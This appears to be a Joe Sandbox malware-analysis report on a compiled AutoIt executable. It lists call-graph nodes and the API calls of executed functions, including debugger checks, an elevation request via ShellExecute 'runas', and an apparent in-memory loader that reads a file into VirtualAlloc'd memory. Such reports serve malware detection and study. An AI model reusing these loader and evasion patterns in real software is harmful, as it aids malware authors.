88185->88217 88186 408e5a 88186->88051 88188 428a05 88190 408f40 VariantClear 88188->88190 88189 40ba10 52 API calls 88192 408dc9 88189->88192 88190->88186 88191 40a780 242 API calls 88191->88192 88192->88185 88192->88186 88192->88188 88192->88189 88192->88191 88193 408e64 88192->88193 88195 408f40 VariantClear 88192->88195 88194 408f40 VariantClear 88193->88194 88194->88186 88195->88192 88197 408f40 VariantClear 88196->88197 88198 403d20 88197->88198 88199 403cd0 VariantClear 88198->88199 88200 403d4d 88199->88200 88219 4755ad 88200->88219 88222 4813fa 88200->88222 88232 474e7f 88200->88232 88248 46e1a6 88200->88248 88296 475596 88200->88296 88299 4632bc 88200->88299 88341 46ae3d 88200->88341 88201 403d76 88201->88049 88201->88060 88209->88049 88210->88052 88212 40bed0 88211->88212 88213 40bef2 88212->88213 88214 427ae9 88212->88214 88218 45e737 90 API calls 3 library calls 88212->88218 88213->88192 88214->88192 88216->88185 88217->88188 88218->88214 88346 475077 88219->88346 88221 4755c0 88221->88201 88223 45340c 85 API calls 88222->88223 88224 481438 88223->88224 88225 402880 95 API calls 88224->88225 88226 48143f 88225->88226 88227 481465 88226->88227 88228 40a780 242 API calls 88226->88228 88231 481469 88227->88231 88471 40e710 53 API calls 88227->88471 88228->88227 88230 4814a4 88230->88201 88231->88201 88233 474e9b 88232->88233 88234 474ecf 88233->88234 88235 474e9f 88233->88235 88236 474f28 88234->88236 88240 474ef8 88234->88240 88237 408f40 VariantClear 88235->88237 88239 474f54 88236->88239 88242 408f40 VariantClear 88236->88242 88238 474ea7 88237->88238 88238->88201 88472 468848 88239->88472 88241 408f40 VariantClear 88240->88241 88244 474f00 88241->88244 88242->88239 88244->88201 88245 474f89 88246 408f40 VariantClear 88245->88246 88247 474fa2 88246->88247 88247->88201 88249 46e1c0 88248->88249 88250 4533eb 85 API calls 88249->88250 88251 46e1dc 88250->88251 88252 46e483 88251->88252 88253 46e2e7 88251->88253 88254 46e1e9 88251->88254 88252->88201 88256 40f760 128 API calls 88253->88256 88255 45340c 85 API calls 88254->88255 88263 46e1f4 _wcscpy _wcschr 88255->88263 88257 46e2f7 88256->88257 88258 46e2fc 88257->88258 88259 46e30d 88257->88259 88261 403cd0 VariantClear 88258->88261 88260 45340c 85 API calls 88259->88260 88262 46e332 88260->88262 88264 46e2c8 88261->88264 88265 413a0e __wsplitpath 46 API calls 88262->88265 88270 46e216 _wcscat _wcscpy 88263->88270 88273 46e248 _wcscat 88263->88273 88266 408f40 VariantClear 88264->88266 88275 46e338 _wcscat _wcscpy 88265->88275 88267 46e2d0 88266->88267 88267->88201 88268 45340c 85 API calls 88269 46e264 _wcscpy 88268->88269 88660 433998 GetFileAttributesW 88269->88660 88271 45340c 85 API calls 88270->88271 88271->88273 88273->88268 88274 46e27d _wcslen 88274->88264 88276 45340c 85 API calls 88274->88276 88278 45340c 85 API calls 88275->88278 88277 46e2b0 88276->88277 88661 44bd27 80 API calls 4 library calls 88277->88661 88280 46e3e3 88278->88280 88597 433784 88280->88597 88281 46e2bd 88281->88252 88281->88264 88283 46e3e9 88297 475077 126 API calls 88296->88297 88298 4755a9 88297->88298 88298->88201 88300 40bc70 52 API calls 88299->88300 88301 4632d5 88300->88301 88302 4533eb 85 API calls 88301->88302 88303 4632e3 88302->88303 88701 4013c0 88303->88701 88306 4533eb 85 API calls 88307 4632fd 88306->88307 88308 463399 88307->88308 88312 463315 88307->88312 88309 45340c 85 API calls 88308->88309 88310 46339f 88309->88310 88706 4533b1 88310->88706 88311 463373 88712 40e710 53 API calls 88311->88712 88312->88311 88315 46332f 88312->88315 88317 461465 52 API calls 88315->88317 88316 4633af 88316->88311 88318 46333d 88317->88318 88319 40bd50 52 API calls 88318->88319 88321 463347 88319->88321 88323 461465 52 API calls 88321->88323 88326 463380 88326->88201 88342 4680ed 55 API calls 88341->88342 88343 46ae50 88342->88343 88344 408f40 VariantClear 88343->88344 88345 46ae65 88344->88345 88345->88201 88397 4533eb 88346->88397 88349 4750ee 88352 408f40 VariantClear 88349->88352 88350 475129 88401 4646e0 88350->88401 88357 4750f5 88352->88357 88353 47515e 88354 475162 88353->88354 88381 47518e 88353->88381 88355 408f40 VariantClear 88354->88355 88378 475169 88355->88378 88356 475357 88358 475365 88356->88358 88359 4754ea 88356->88359 88357->88221 88366 4533eb 85 API calls 88366->88381 88374 475480 88376 408f40 VariantClear 88374->88376 88376->88378 88378->88221 88381->88356 88381->88366 88381->88374 88386 4754b5 88381->88386 88433 436299 52 API calls 2 library calls 88381->88433 88434 463ad5 64 API calls __wcsicoll 88381->88434 88387 408f40 VariantClear 88386->88387 88387->88378 88398 453404 88397->88398 88399 4533f8 88397->88399 88398->88349 88398->88350 88399->88398 88444 4531b1 85 API calls 5 library calls 88399->88444 88445 4536f7 53 API calls 88401->88445 88403 4646fc 88446 4426cd 88403->88446 88405 464711 88407 40bc70 52 API calls 88405->88407 88413 46474b 88405->88413 88408 46472c 88407->88408 88454 461465 88408->88454 88410 464741 88412 464793 88412->88353 88413->88412 88467 463ad5 64 API calls __wcsicoll 88413->88467 88433->88381 88434->88381 88444->88398 88445->88403 88448 4426f5 _wcslen 88446->88448 88447 442866 88447->88405 88448->88447 88450 4427b7 88448->88450 88452 44272a 88448->88452 88449 4427b2 88449->88405 88450->88449 88469 40e790 59 API calls 88450->88469 88452->88449 88468 40e790 59 API calls 88452->88468 88455 4614cf 88454->88455 88456 461478 88454->88456 88457 40c600 52 API calls 88455->88457 88456->88455 88459 461482 88456->88459 88458 4614da 88457->88458 88458->88410 88460 4614e1 88459->88460 88461 46149c 88459->88461 88467->88412 88468->88452 88469->88450 88471->88230 88475 4684dc 88472->88475 88474 468867 88474->88245 88551 45360e 88475->88551 88477 468507 88478 46850d 88477->88478 88480 468527 88477->88480 88479 408f40 VariantClear 88478->88479 88481 468512 88479->88481 88482 468582 88480->88482 88483 468562 88480->88483 88481->88474 88484 468586 88482->88484 88485 4685a2 88482->88485 88486 408f40 VariantClear 88483->88486 88571 46822a 90 API calls 2 library calls 88484->88571 88489 468644 88485->88489 88493 468623 88485->88493 88494 4685bf 88485->88494 88487 468567 88486->88487 88487->88474 88491 468675 88489->88491 88492 46864b 88489->88492 88490 468599 88490->88474 88497 4686e8 88491->88497 88498 468679 88491->88498 88495 468658 88492->88495 88572 44b3ac 57 API calls 88492->88572 88493->88489 88499 468627 88493->88499 88494->88489 88496 4685c7 88494->88496 88501 408f40 VariantClear 88495->88501 88556 4680ed 88496->88556 88503 46880e 88497->88503 88507 4687f2 88497->88507 88508 4686fc 88497->88508 88509 46874a 88497->88509 88510 468799 88497->88510 88504 4686b9 88498->88504 88530 468681 88498->88530 88505 453132 53 API calls 88499->88505 88503->88474 88511 468630 _memmove 88505->88511 88511->88474 88530->88503 88552 453623 88551->88552 88553 45365a 88552->88553 88554 45340c 85 API calls 88552->88554 88555 4114ab __wcsicoll 58 API calls 88552->88555 88553->88477 88554->88552 88555->88552 88557 468100 88556->88557 88558 4680fa 88556->88558 88571->88490 88572->88495 88598 433791 _wcschr __write_nolock 88597->88598 88599 4337a8 _wcscpy 88598->88599 88600 413a0e __wsplitpath 46 API calls 88598->88600 88599->88283 88601 4337dd 88600->88601 88660->88274 88661->88281 88702 4115d7 52 API calls 88701->88702 88703 4013e4 88702->88703 88704 4013a0 52 API calls 88703->88704 88705 4013f3 88704->88705 88705->88306 88707 4533e0 88706->88707 88708 4533be 88706->88708 88707->88316 88709 4533d5 88708->88709 88714 4531b1 85 API calls 5 library calls 88708->88714 88709->88316 88711 4533ca 88711->88316 88712->88326 88714->88711 88715 42d154 88719 480a8d 88715->88719 88717 42d161 88718 480a8d 242 API calls 88717->88718 88718->88717 88720 480ae4 88719->88720 88721 480b26 88719->88721 88722 480aeb 88720->88722 88723 480b15 88720->88723 88724 40bc70 52 API calls 88721->88724 88725 480aee 88722->88725 88726 480b04 88722->88726 88752 4805bf 242 API calls 88723->88752 88740 480b2e 88724->88740 88725->88721 88728 480af3 88725->88728 88751 47fea2 242 API calls __itow_s 88726->88751 88750 47f135 242 API calls 88728->88750 88730 40e0a0 52 API calls 88730->88740 88733 408f40 VariantClear 88734 481156 88733->88734 88737 408f40 VariantClear 88734->88737 88735 40c2c0 52 API calls 88735->88740 88736 480aff 88736->88733 88738 48115e 88737->88738 88738->88717 88739 40e710 53 API calls 88739->88740 88740->88730 88740->88735 88740->88736 88740->88739 88741 401980 53 API calls 88740->88741 88743 408e80 VariantClear 88740->88743 88744 480ff5 88740->88744 88745 40a780 242 API calls 88740->88745 88753 45377f 52 API calls 88740->88753 88754 45e951 53 API calls 88740->88754 88755 40e830 53 API calls 88740->88755 88756 47925f 53 API calls 88740->88756 88757 47fcff 242 API calls 88740->88757 88741->88740 88743->88740 88758 45e737 90 API calls 3 library calls 88744->88758 88745->88740 88750->88736 88751->88736 88752->88736 88753->88740 88754->88740 88755->88740 88756->88740 88757->88740 88758->88736 88759 2f3295b 88760 2f32962 88759->88760 88761 2f32a00 88760->88761 88762 2f3296a 88760->88762 88779 2f332b0 9 API calls 88761->88779 88766 2f32610 88762->88766 88765 2f329e7 88767 2f30000 GetPEB 88766->88767 88768 2f326af 88767->88768 88771 2f32709 VirtualAlloc 88768->88771 88772 2f326ed 88768->88772 88777 2f32810 CloseHandle 88768->88777 88778 2f32820 VirtualFree 88768->88778 88780 2f33520 GetPEB 88768->88780 88770 2f326e0 CreateFileW 88770->88768 88770->88772 88771->88772 88773 2f3272a ReadFile 88771->88773 88774 2f3290a 88772->88774 88775 2f328fc VirtualFree 88772->88775 88773->88772 88776 2f32748 VirtualAlloc 88773->88776 88774->88765 88775->88774 88776->88768 88776->88772 88777->88768 88778->88768 88779->88765 88781 2f3354a 88780->88781 88781->88770 88782 425b2b 88787 40f000 88782->88787 88786 425b3a 88788 4115d7 52 API calls 88787->88788 88789 40f007 88788->88789 88790 4276ea 88789->88790 88796 40f030 88789->88796 88795 41130a 51 API calls __cinit 88795->88786 88797 40f039 88796->88797 88798 40f01a 88796->88798 88826 41130a 51 API calls __cinit 88797->88826 88800 40e500 88798->88800 88801 40bc70 52 API calls 88800->88801 88802 40e515 GetVersionExW 88801->88802 88803 402160 52 API calls 88802->88803 88804 40e557 88803->88804 88827 40e660 88804->88827 88810 427674 88814 4276c6 GetSystemInfo 88810->88814 88812 40e5e0 88815 4276d5 GetSystemInfo 88812->88815 88841 40efd0 88812->88841 88813 40e5cd GetCurrentProcess 88848 40ef20 LoadLibraryA GetProcAddress 88813->88848 88814->88815 88819 40e629 88845 40ef90 88819->88845 88822 40e641 FreeLibrary 88823 40e644 88822->88823 88824 40e653 FreeLibrary 88823->88824 88825 40e656 88823->88825 88824->88825 88825->88795 88826->88798 88828 40e667 88827->88828 88829 42761d 88828->88829 88830 40c600 52 API calls 88828->88830 88831 40e55c 88830->88831 88832 40e680 88831->88832 88833 40e687 88832->88833 88834 427616 88833->88834 88835 40c600 52 API calls 88833->88835 88836 40e566 88835->88836 88836->88810 88837 40ef60 88836->88837 88838 40e5c8 88837->88838 88839 40ef66 LoadLibraryA 88837->88839 88838->88812 88838->88813 88839->88838 88840 40ef77 GetProcAddress 88839->88840 88840->88838 88842 40e620 88841->88842 88843 40efd6 LoadLibraryA 88841->88843 88842->88814 88842->88819 88843->88842 88844 40efe7 GetProcAddress 88843->88844 88844->88842 88849 40efb0 LoadLibraryA GetProcAddress 88845->88849 88847 40e632 GetNativeSystemInfo 88847->88822 88847->88823 88848->88812 88849->88847 88850 425b5e 88855 40c7f0 88850->88855 88854 425b6d 88890 40db10 52 API calls 88855->88890 88857 40c82a 88891 410ab0 6 API calls 88857->88891 88859 40c86d 88860 40bc70 52 API calls 88859->88860 88861 40c877 88860->88861 88862 40bc70 52 API calls 88861->88862 88863 40c881 88862->88863 88864 40bc70 52 API calls 88863->88864 88865 40c88b 88864->88865 88866 40bc70 52 API calls 88865->88866 88867 40c8d1 88866->88867 88868 40bc70 52 API calls 88867->88868 88869 40c991 88868->88869 88892 40d2c0 52 API calls 88869->88892 88871 40c99b 88893 40d0d0 53 API calls 88871->88893 88873 40c9c1 88874 40bc70 52 API calls 88873->88874 88875 40c9cb 88874->88875 88894 40e310 53 API calls 88875->88894 88877 40ca28 88878 408f40 VariantClear 88877->88878 88879 40ca30 88878->88879 88880 408f40 VariantClear 88879->88880 88881 40ca38 GetStdHandle 88880->88881 88882 429630 88881->88882 88883 40ca87 88881->88883 88882->88883 88884 429639 88882->88884 88889 41130a 51 API calls __cinit 88883->88889 88895 4432c0 57 API calls 88884->88895 88886 429641 88896 44b6ab CreateThread 88886->88896 88888 42964f CloseHandle 88888->88883 88889->88854 88890->88857 88891->88859 88892->88871 88893->88873 88894->88877 88895->88886 88896->88888 88897 44b5cb 58 API calls 88896->88897 88898 425b6f 88903 40dc90 88898->88903 88902 425b7e 88904 40bc70 52 API calls 88903->88904 88905 40dd03 88904->88905 88911 40f210 88905->88911 88908 40dd96 88909 40ddb7 88908->88909 88914 40dc00 52 API calls 2 library calls 88908->88914 88910 41130a 51 API calls __cinit 88909->88910 88910->88902 88915 40f250 RegOpenKeyExW 88911->88915 88913 40f230 88913->88908 88914->88908 88916 425e17 88915->88916 88917 40f275 RegQueryValueExW 88915->88917 88916->88913 88918 40f2c3 RegCloseKey 88917->88918 88919 40f298 88917->88919 88918->88913 88920 40f2a9 RegCloseKey 88919->88920 88921 425e1d 88919->88921 88920->88913

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                                                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104,?), ref: 00401F4C
                                                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                                                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\x.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                                                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                                                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\x.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                    • API String ID: 2495805114-1096746028
                                                                                                                                                    • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                    • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                                                                                                    Function 0040E500 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1187 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1196 40e582-40e583 1187->1196 1197 427674-427679 1187->1197 1200 40e585-40e596 1196->1200 1201 40e5ba-40e5cb call 40ef60 1196->1201 1198 427683-427686 1197->1198 1199 42767b-427681 1197->1199 1203 427693-427696 1198->1203 1204 427688-427691 1198->1204 1202 4276b4-4276be 1199->1202 1205 427625-427629 1200->1205 1206 40e59c-40e59f 1200->1206 1218 40e5ec-40e60c 1201->1218 1219 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1201->1219 1220 4276c6-4276ca GetSystemInfo 1202->1220 1203->1202 1210 427698-4276a8 1203->1210 1204->1202 1212 427636-427640 1205->1212 1213 42762b-427631 1205->1213 1208 40e5a5-40e5ae 1206->1208 1209 427654-427657 1206->1209 1214 40e5b4 1208->1214 1215 427645-42764f 1208->1215 1209->1201 1221 42765d-42766f 1209->1221 1216 4276b0 1210->1216 1217 4276aa-4276ae 1210->1217 1212->1201 1213->1201 1214->1201 1215->1201 1216->1202 1217->1202 1222 40e612-40e623 call 40efd0 1218->1222 1223 4276d5-4276df GetSystemInfo 1218->1223 1219->1218 1231 40e5e8 1219->1231 1220->1223 1221->1201 1222->1220 1228 40e629-40e63f call 40ef90 GetNativeSystemInfo 1222->1228 1233 40e641-40e642 FreeLibrary 1228->1233 1234 40e644-40e651 1228->1234 1231->1218 1233->1234 1235 40e653-40e654 FreeLibrary 1234->1235 1236 40e656-40e65d 1234->1236 1235->1236
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                                                                    • String ID: 0SH$Wu
                                                                                                                                                    • API String ID: 3363477735-1135818761
                                                                                                                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                                                                    Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                    • API String ID: 2574300362-3542929980
                                                                                                                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                                                                    Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                    • String ID: Wu
                                                                                                                                                    • API String ID: 3403648963-4083010176
                                                                                                                                                    • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                    • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                    • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                    • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                    Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
